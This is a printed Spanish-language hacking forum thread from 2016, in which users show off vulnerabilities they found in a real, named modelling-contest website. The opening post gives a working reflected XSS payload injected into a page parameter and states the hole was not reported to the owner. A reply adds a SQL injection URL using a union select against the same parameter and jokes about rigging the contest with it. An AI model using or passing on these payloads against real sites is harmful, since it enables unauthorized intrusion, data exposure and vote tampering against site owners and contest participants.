Imprimir Página - [XSS] kattypulido.com

Título: [XSS] kattypulido.com
Publicado por: andergedon en Noviembre 27, 2016, 03:17:04 AM

¡Hola! Una amiga me pidió que votara por ella en un concurso de modelaje. Luego de hacerle el favor, no podía dejar la web sin inyectar un simple script por curiosidad.

(http://i.imgur.com/sq6calV.jpg)

-URL: http://www.kattypulido.com/wp/detalles.php?campo_ID= (http://www.kattypulido.com/wp/detalles.php?campo_ID=)

-Vector: "><script>alert('xsS')</script> || http://www.kattypulido.com/wp/detalles.php?campo_ID="><script>alert('xsS')</script> (http://www.kattypulido.com/wp/detalles.php?campo_ID="><script>alert('xsS')</script>)

-Reportado: NO.

Título: Re:[XSS] kattypulido.com
Publicado por: EPSILON en Noviembre 28, 2016, 04:33:06 PM

Quizas podas hacerla ganadora con esto: LINK (http://www.kattypulido.com/wp/detalles.php?campo_ID=1%27+union+select+1,2,@@version,4,5,6,7,8,9,10,11+--+) xDxD

Título: Re:[XSS] kattypulido.com
Publicado por: andergedon en Noviembre 28, 2016, 05:19:56 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Quizas podas hacerla ganadora con esto: LINK (http://www.kattypulido.com/wp/detalles.php?campo_ID=1%27+union+select+1,2,@@version,4,5,6,7,8,9,10,11+--+) xDxD

jaja! Increíble. Algo me decía que también era vulnerable a sqli. Pero pensé "Hasta que no consiga tiempo para aprender sobre sql, nunca lo sabré" ;D

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: andergedon en Noviembre 27, 2016, 03:17:04 AM